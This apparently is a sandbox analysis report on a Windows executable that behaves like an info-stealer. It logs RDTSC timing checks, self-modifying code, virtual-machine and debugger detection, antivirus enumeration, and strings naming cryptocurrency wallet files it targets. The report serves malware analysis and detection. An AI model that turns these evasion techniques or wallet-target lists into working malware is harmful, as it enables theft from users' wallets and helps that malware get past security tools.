                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EACF1D second address: EACF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD2C8 second address: EAD2EB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA18C4F696h 0x00000008 jmp 00007FCA18C4F6A9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD2EB second address: EAD311 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA18DB50EEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FCA18DB50EFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EAD311 second address: EAD31F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCA18C4F696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4B5A second address: EB4B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4B60 second address: EB4B6A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCA18C4F696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4D29 second address: EB4D2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4D2E second address: EB4D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB527A second address: EB5280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5280 second address: EB5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5286 second address: EB52A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA18DB50EFh 0x0000000d jc 00007FCA18DB50E6h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB52A4 second address: EB52A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB52A9 second address: EB52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5463 second address: EB5469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB5898 second address: EB58B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCA18DB50F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB58B8 second address: EB58C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB45FC second address: EB461D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCA18DB50F8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB461D second address: EB4623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EB4623 second address: EB464D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 js 00007FCA18DB50E6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA853 second address: EBA86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA86B second address: EBA871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA871 second address: EBA890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FCA18C4F69Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FCA18C4F69Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA890 second address: EBA894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA894 second address: EBA89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA89A second address: EBA8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: EBA8A3 second address: EBA8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FCA18C4F696h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460692 second address: 5460698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460698 second address: 546069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606B2 second address: 54606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606B6 second address: 54606BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606BC second address: 54606C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606C2 second address: 54606F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a jmp 00007FCA18DB50EEh 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCA18DB50F7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54606F5 second address: 5460025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCA8928D5D9h 0x0000000f xor eax, eax 0x00000011 jmp 00007FCA18C28DCAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007FCA18C4F7D5h 0x0000002e call 00007FCA1D43B6DCh 0x00000033 mov edi, edi 0x00000035 jmp 00007FCA18C4F69Dh 0x0000003a xchg eax, ebp 0x0000003b jmp 00007FCA18C4F69Eh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460025 second address: 5460041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460041 second address: 5460068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA18C4F6A5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460068 second address: 5460078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18DB50ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460078 second address: 546007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546007C second address: 5460092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA18DB50EAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54600E6 second address: 54600EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54600EA second address: 5460107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460107 second address: 5460145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 01h 0x00000005 pushfd 0x00000006 jmp 00007FCA18C4F6A8h 0x0000000b add cx, 2F68h 0x00000010 jmp 00007FCA18C4F69Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 leave 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov edx, 34F0D6D6h 0x00000022 mov dl, 8Ah 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460145 second address: 546014B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 546014B second address: 546014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460A10 second address: 5460A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B18 second address: 5460B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B1C second address: 5460B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B56 second address: 5460B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B5A second address: 5460B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B5E second address: 5460B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B64 second address: 5460B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B6A second address: 5460B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B6E second address: 5460B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FCA893D8EF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA18DB50EFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B8D second address: 5460BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F6A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460BA5 second address: 5460BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547090B second address: 547090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547090F second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547092A second address: 547092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547092F second address: 5470991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCA18DB50EEh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCA18DB50F0h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FCA18DB50F0h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FCA18DB50F0h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 mov dl, D8h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FCA18DB50EBh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470991 second address: 54709D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov dh, ch 0x0000000f call 00007FCA18C4F6A9h 0x00000014 pop ebx 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54709D6 second address: 5470A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 665467B1h 0x0000000e popad 0x0000000f je 00007FCA893D2AA9h 0x00000015 jmp 00007FCA18DB50ECh 0x0000001a cmp dword ptr [75AF459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCA18DB50F7h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A26 second address: 5470A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A2C second address: 5470A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A30 second address: 5470A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FCA892850F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A44 second address: 5470A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A48 second address: 5470A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A4E second address: 5470A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov dl, 69h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA18DB50EEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A6C second address: 5470A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A70 second address: 5470A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A76 second address: 5470A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F69Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A87 second address: 5470A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A8B second address: 5470AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 42D43DF9h 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, 609B02BBh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470AA1 second address: 5470AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCA18DB50F9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470B21 second address: 5470B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCA18C4F6A7h 0x00000011 sbb esi, 05291C1Eh 0x00000017 jmp 00007FCA18C4F6A9h 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCA18C4F6A6h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470B8D second address: 5470B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Special instruction interceptor: First address: C98C6D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Special instruction interceptor: First address: E38A02 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Special instruction interceptor: First address: E61D38 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe TID: 5876 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe TID: 5876 Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: YKri2nEBWE.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: YKri2nEBWE.exe Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File opened: NTICE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File opened: SICE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Code function: 0_2_00C7E110 LdrInitializeThunk,0_2_00C7E110

                HIPS / PFW / Operating System Protection Evasion

                Source: YKri2nEBWE.exe, YKri2nEBWE.exe, 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Program Manager
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366833614.000000000154A000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368457794.000000000154C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309790359.000000000154A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match; File source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Wallets/Electrum-LTC
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Wallets/ElectronCash
                Source: YKri2nEBWE.exe; String found in binary or memory: Jaxx Liberty
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: window-state.json
                Source: YKri2nEBWE.exe; String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Wallets/Ethereum
                Source: YKri2nEBWE.exe; String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
